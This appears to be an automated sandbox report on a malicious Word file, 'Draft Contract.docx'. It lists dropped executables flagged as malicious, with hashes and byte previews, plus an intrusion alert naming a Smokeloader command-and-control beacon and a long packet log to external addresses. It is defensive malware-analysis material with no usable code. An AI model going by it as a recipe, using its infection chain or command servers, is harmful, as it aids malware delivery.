                                                                                Malicious:false
                                                                                Preview:[folders]..Templates.LNK=0..000000_0000000_000000_000000_0000000_000000_000000 on 3236135985.url=0..Draft Contract.LNK=0..[doc]..0000_000000_00000.doc.url=0..[misc]..Draft Contract.LNK=0..
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):162
                                                                                Entropy (8bit):2.503835550707525
                                                                                Encrypted:false
                                                                                SSDEEP:3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
                                                                                MD5:7CFA404FD881AF8DF49EA584FE153C61
                                                                                SHA1:32D9BF92626B77999E5E44780BF24130F3D23D66
                                                                                SHA-256:248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
                                                                                SHA-512:F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
                                                                                Malicious:false
                                                                                Preview:.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):8016
                                                                                Entropy (8bit):3.5796660849446966
                                                                                Encrypted:false
                                                                                SSDEEP:96:chQCwMqV5qvsqvJCwoPz8hQCwMqV5qvsEHyqvJCwor1zgdKrbSHc6H69plUVpjp:cW/eoPz8W/2Hnor1zgMP96H69Yjp
                                                                                MD5:9E33A26F591A22D669CE465173ADEC5E
                                                                                SHA1:1A26AB70B66EE49E4CCEF74AC53FDF359509EA62
                                                                                SHA-256:E2AC6D046118146EDED17D0AE3D8B07F950A4380BDEC722816809DD7C91984A6
                                                                                SHA-512:8775F9EA1E7DBBFDA35EE0C463D724099E92C509E9EB323E633148F74BDA8EFB9C9960C6B316F7E1A1AFBA8978E1A00A0179188E7037CD7CE62E8D74BF618328
                                                                                Malicious:false
                                                                                Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):8016
                                                                                Entropy (8bit):3.5796660849446966
                                                                                Encrypted:false
                                                                                SSDEEP:96:chQCwMqV5qvsqvJCwoPz8hQCwMqV5qvsEHyqvJCwor1zgdKrbSHc6H69plUVpjp:cW/eoPz8W/2Hnor1zgMP96H69Yjp
                                                                                MD5:9E33A26F591A22D669CE465173ADEC5E
                                                                                SHA1:1A26AB70B66EE49E4CCEF74AC53FDF359509EA62
                                                                                SHA-256:E2AC6D046118146EDED17D0AE3D8B07F950A4380BDEC722816809DD7C91984A6
                                                                                SHA-512:8775F9EA1E7DBBFDA35EE0C463D724099E92C509E9EB323E633148F74BDA8EFB9C9960C6B316F7E1A1AFBA8978E1A00A0179188E7037CD7CE62E8D74BF618328
                                                                                Malicious:false
                                                                                Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                Process:C:\Users\user\AppData\Local\Temp\A173.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):123904
                                                                                Entropy (8bit):4.924485657900922
                                                                                Encrypted:false
                                                                                SSDEEP:768:Y5997FKxvnWI06ezN3maHiYNwN8Agw3nZPHbzYKE:Y5evWIw2CAVZDzs
                                                                                MD5:2E1406B0FA96C7F11EA16768E01B2FD1
                                                                                SHA1:DFC79012394CFA1B68C4C079F82CA18720B13E6D
                                                                                SHA-256:AE8DC43802152F82A460CD67CEDCAD7D7F9B505AC617BB090D64629E47169A65
                                                                                SHA-512:EEC4EC19DA5D7DC095A65965E4B40B578979AA34C4F5A3829BAD1488E754EE8910A2FF2DC7DD1DED41BBDA9249FD7DB7C122258BB50E593DE56CA5E8C9541425
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&|c............................V0... ...@....@.. .......................@............`..................................0..J....@....................... ....................................................... ............... ..H............text...\.... ...................... ..`.rsrc........@......................@..@.reloc....... ......................@..B................<0......H........#................................................................(....*..(....*v+.+.r...p+.*.+.o....+.(....+...v+.+.r_..p+.*.+.o....+.(....+...Rru..p+......*(....+.....0..f.......+=..-.i.-.+6+7+8+=+B.,.+@+A+B....-.(.......1..,....(.....t....*.+..+..+.o....+.o....+..+..+..+.(....+....0..V........,-+5t....+5~....-........s.........~....+...+ &.-..-..,.*(....+.o....+.(...++.o....+....0..O........,'+(+-+2~....-........s.........~....+.+.+ *(....+.(....+.o....+.(...++..+.
                                                                                Process:C:\Windows\explorer.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):308896
                                                                                Entropy (8bit):7.999456031894601
                                                                                Encrypted:true
                                                                                SSDEEP:6144:FN+w+upwnCDhEvjxaITQyBa6lsFYYqim7eneMXzur:FNPpwC2IITVBhlsFrqiZxDur
                                                                                MD5:96959E48938208D1BE136C77B4EF87CE
                                                                                SHA1:31AEE2DC7B458ABAFBA025741261CE960D2345E7
                                                                                SHA-256:8531BBD102970E363807CA4CE1A760E5904733C3F9D13ED444662D7F10C9782B
                                                                                SHA-512:49CF63F00A0EFA91803EC5BF5CFCB454E5F9C5ABCF4A6AFB4CCCA14C86A5C4F48793A32D123EBF296B51E5FF9BF5DB42CDAB53C7BE4FD11A006E1B89F22C0145
                                                                                Malicious:false
                                                                                Preview:.D.;..~.........E..}./.n...z.....2....#..q.]..5!A.M.S..T.......l>.r.T....V.yCq.N..{.%......L1.(3.q.9.....:..e.:mF..O..=b4..I.&..h8i.|EC.!.?./...?@.....yt.?:.9..e.SH......4mi.Y2.Y..V...r.!..... ._.r..}Z?..%:.D.`.........eK...5...@.Q.H...@.......Uh.`3Q....Qi.... ..._...1........1n. }o|.=....r./.;../...q./0...?..w......@bw..D.s."...[.P......]........O.".....x..#.a..~D2R.=..o..Q...T...5^.Yg.|...c^A.".c.b.^..;....p..^.)..M<.......T......g..%.xuE[.P.....#By.w....&.a...B^0?......&f! ...b.%...REM.i8+].H=-8....t....P...t.g.....MM..(W.].a....>.`}]...N.A..6..,...........l.....+ci[.i..y.A..2....VS.:F...X.?Z...i.!.Kc~../....gD^..#....[...zW.c..A..x..Y;._..C....8._.O....7.....!.."...[....b....m.E[.Y......?tM.[....l|u.P[.U.Z=..wr..9.F.m.s.$*...P]......_.w.Q.....#.dk.'.....5..&.t.L.V......*Z.A.M....n./*}tTx.5.x`.2.5...HR..}... ...ta....^..T.F.N5H..jR4........h....Z.......y..:.B...Vv|0.7a..$;."q........-.7.TlA.Kzq.;.T.=.}...x.....L.q+rB....-...;%.2..B...H.
                                                                                Process:C:\Windows\explorer.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):192000
                                                                                Entropy (8bit):6.9670159394895705
                                                                                Encrypted:false
                                                                                SSDEEP:3072:uZdNpvK0wWVUOK5qGma938JLYuFksJ8c:uZogUwG78Vys+c
                                                                                MD5:FCAA733B76E66945EF88308FD504C0DC
                                                                                SHA1:5BFF6AF218AD04BED92C6FFD0A83D488B5F5DFAA
                                                                                SHA-256:177AC53BD8B7B2C9D58E869FA7E76D801DA7A32176E8EFFA10A90F920FD5450E
                                                                                SHA-512:2A51BCDFDF6B05FBAC49BC2778D901D7DE7EF1603D9F9B9C619EB2D2A8635110A496D8F5DC8694162A062AB704406CF75929CF02F78339E804096A16D377E54D
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 35%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L."..."..."......"....<."..RY..."...#.'."......"......"......".Rich..".........................PE..L...[.fb.............................m............@..........................@.................................................P........7...........................................................;..@...............<............................text...*........................... ..`.data....F..........................@....rsrc....7.......8..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\A173.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):123904
                                                                                Entropy (8bit):4.924485657900922
                                                                                Encrypted:false
                                                                                SSDEEP:768:Y5997FKxvnWI06ezN3maHiYNwN8Agw3nZPHbzYKE:Y5evWIw2CAVZDzs
                                                                                MD5:2E1406B0FA96C7F11EA16768E01B2FD1
                                                                                SHA1:DFC79012394CFA1B68C4C079F82CA18720B13E6D
                                                                                SHA-256:AE8DC43802152F82A460CD67CEDCAD7D7F9B505AC617BB090D64629E47169A65
                                                                                SHA-512:EEC4EC19DA5D7DC095A65965E4B40B578979AA34C4F5A3829BAD1488E754EE8910A2FF2DC7DD1DED41BBDA9249FD7DB7C122258BB50E593DE56CA5E8C9541425
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&|c............................V0... ...@....@.. .......................@............`..................................0..J....@....................... ....................................................... ............... ..H............text...\.... ...................... ..`.rsrc........@......................@..@.reloc....... ......................@..B................<0......H........#................................................................(....*..(....*v+.+.r...p+.*.+.o....+.(....+...v+.+.r_..p+.*.+.o....+.(....+...Rru..p+......*(....+.....0..f.......+=..-.i.-.+6+7+8+=+B.,.+@+A+B....-.(.......1..,....(.....t....*.+..+..+.o....+.o....+..+..+..+.(....+....0..V........,-+5t....+5~....-........s.........~....+...+ &.-..-..,.*(....+.o....+.(...++.o....+....0..O........,'+(+-+2~....-........s.........~....+.+.+ *(....+.(....+.o....+.(...++..+.
                                                                                Process:C:\Users\user\AppData\Local\Temp\A173.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, file counter 9, database pages 7, 1st free page 7, free pages 2, cookie 0xd, schema 4, UTF-8, version-valid-for 9
                                                                                Category:dropped
                                                                                Size (bytes):28672
                                                                                Entropy (8bit):0.9650411582864293
                                                                                Encrypted:false
                                                                                SSDEEP:48:T2loMLOpEO5J/KdGU1jX983Gul4kEBrvK5GYWgqRSESXh:inNww9t9wGAE
                                                                                MD5:903C35B27A5774A639A90D5332EEF8E0
                                                                                SHA1:5A8CE0B6C13D1AF00837AA6CA1AA39000D4EB7CF
                                                                                SHA-256:1159B5AE357F89C56FA23C14378FF728251E6BDE6EEA979F528DB11C4030BE74
                                                                                SHA-512:076BD35B0D59FFA7A52588332A862814DDF049EE59E27542A2DA10E7A5340758B8C8ED2DEFE78C5B5A89EE54C19A89D49D2B86B49BF5542D76C1D4A378B40277
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................C..........g...N......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\A173.exe
                                                                                File Type:SQLite 3.x database, user version 7, last written using SQLite version 3017000, page size 32768, writer version 2, read version 2, file counter 4, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 4
                                                                                Category:dropped
                                                                                Size (bytes):524288
                                                                                Entropy (8bit):0.08107860342777487
                                                                                Encrypted:false
                                                                                SSDEEP:48:DO8rmWT8cl+fpNDId7r+gUEl1B6nB6UnUqc8AqwIhY5wXwwAVshT:DOUm7ii+7Ue1AQ98VVY
                                                                                MD5:1138F6578C48F43C5597EE203AFF5B27
                                                                                SHA1:9B55D0A511E7348E507D818B93F1C99986D33E7B
                                                                                SHA-256:EEEDF71E8E9A3A048022978336CA89A30E014AE481E73EF5011071462343FFBF
                                                                                SHA-512:6D6D7ECF025650D3E2358F5E2D17D1EC8D6231C7739B60A74B1D8E19D1B1966F5D88CC605463C3E26102D006E84D853E390FFED713971DC1D79EB1AB6E56585E
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ...........................................................................(.....}..~...}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):162
                                                                                Entropy (8bit):2.503835550707525
                                                                                Encrypted:false
                                                                                SSDEEP:3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
                                                                                MD5:7CFA404FD881AF8DF49EA584FE153C61
                                                                                SHA1:32D9BF92626B77999E5E44780BF24130F3D23D66
                                                                                SHA-256:248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
                                                                                SHA-512:F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
                                                                                Malicious:false
                                                                                Preview:.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...
                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):192000
                                                                                Entropy (8bit):6.9670159394895705
                                                                                Encrypted:false
                                                                                SSDEEP:3072:uZdNpvK0wWVUOK5qGma938JLYuFksJ8c:uZogUwG78Vys+c
                                                                                MD5:FCAA733B76E66945EF88308FD504C0DC
                                                                                SHA1:5BFF6AF218AD04BED92C6FFD0A83D488B5F5DFAA
                                                                                SHA-256:177AC53BD8B7B2C9D58E869FA7E76D801DA7A32176E8EFFA10A90F920FD5450E
                                                                                SHA-512:2A51BCDFDF6B05FBAC49BC2778D901D7DE7EF1603D9F9B9C619EB2D2A8635110A496D8F5DC8694162A062AB704406CF75929CF02F78339E804096A16D377E54D
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 35%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L."..."..."......"....<."..RY..."...#.'."......"......"......".Rich..".........................PE..L...[.fb.............................m............@..........................@.................................................P........7...........................................................;..@...............<............................text...*........................... ..`.data....F..........................@....rsrc....7.......8..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                File type:Microsoft Word 2007+
                                                                                Entropy (8bit):6.902402667941193
                                                                                TrID:
                                                                                • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                • ZIP compressed archive (8000/1) 7.92%
                                                                                File name:Draft Contract.docx
                                                                                File size:10364
                                                                                MD5:f234b75ef845ebf3fdee1da95855bfb5
                                                                                SHA1:be749bba219ca80114f702b014151308d5e184d8
                                                                                SHA256:c18b135527946cd4e984bdaa65aac4487e650c18791a40f30506dd3f4d2ca659
                                                                                SHA512:6e224f5a05653c7efab7c48a0aa0eea0d26edc60f7eb551fc4fbccdb510e64d6a26719790f447aea6aef10abb11de77ce6183513bb343d0d18876a1018ecc975
                                                                                SSDEEP:192:ScIMmtPqCJuEG/bBLgOBptphz2ru5JhBH3DV:SPXyJTJgOBpcaJr5
                                                                                TLSH:BB228D28D501FD0BD039457CE064C2B5F6285163E912B96B2194372D47A17C39BEEFBA
                                                                                File Content Preview:PK..........!....7f... .......[Content_Types].xml ...(.........................................................................................................................................................................................................
                                                                                Icon Hash:e4e6a2a2a4b4b4a4
                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                192.168.2.2234.174.217.4249173802851815 11/22/22-05:09:04.662213TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184917380192.168.2.2234.174.217.42
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Nov 22, 2022 05:08:12.989948034 CET4917180192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:13.107698917 CET8049171192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:13.108001947 CET4917180192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:13.108572006 CET4917180192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:13.230000019 CET8049171192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:13.230066061 CET8049171192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:13.230109930 CET8049171192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:13.230143070 CET8049171192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:13.230218887 CET4917180192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:13.230253935 CET8049171192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:13.230288982 CET8049171192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:13.230321884 CET8049171192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:13.230355024 CET8049171192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:13.230386972 CET8049171192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:13.230422020 CET8049171192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:13.230684042 CET4917180192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:13.233901024 CET4917180192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:13.347867966 CET8049171192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:13.347939014 CET8049171192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:13.347985029 CET8049171192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:13.348028898 CET8049171192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:13.348043919 CET4917180192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:13.348073959 CET8049171192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:13.348099947 CET4917180192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:13.348099947 CET4917180192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:13.348125935 CET4917180192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.487679958 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.605350018 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.607636929 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.608422995 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.728528023 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.728578091 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.728610039 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.728640079 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.728650093 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.728650093 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.728677034 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.728708982 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.728714943 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.728743076 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.728754997 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.728775978 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.728801012 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.728826046 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.744631052 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.790977955 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.846160889 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.846196890 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.846220016 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.846242905 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.846265078 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.846287966 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.846298933 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.846298933 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.846298933 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.846309900 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.846334934 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.846357107 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.846368074 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.846368074 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.846368074 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.846380949 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.846399069 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.846405983 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.846415043 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.846431017 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.846442938 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.846465111 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.848176003 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.861980915 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.862040997 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.862062931 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.862085104 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.862107038 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.862129927 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.862134933 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.862134933 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.862153053 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.862178087 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.862198114 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.862198114 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.862198114 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.862224102 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.964740038 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.964801073 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.964839935 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.964879990 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.964925051 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.964963913 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.964981079 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.965023994 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.965039968 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.965101004 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.965116978 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.965142012 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.965159893 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.965181112 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.965212107 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.965243101 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.965280056 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.965303898 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.965321064 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.965361118 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.965385914 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.965399027 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.965442896 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.965457916 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.965482950 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.965521097 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.965544939 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.965563059 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.965620041 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.965622902 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.965660095 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.965699911 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.965723991 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.965739012 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.965799093 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.979327917 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.979391098 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.979437113 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.979480028 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.979506969 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.979506969 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.979521990 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.979532003 CET4917280192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:08:15.979571104 CET8049172192.227.132.49192.168.2.22
                                                                                Nov 22, 2022 05:08:15.979577065 CET4917280192.168.2.22192.227.132.49
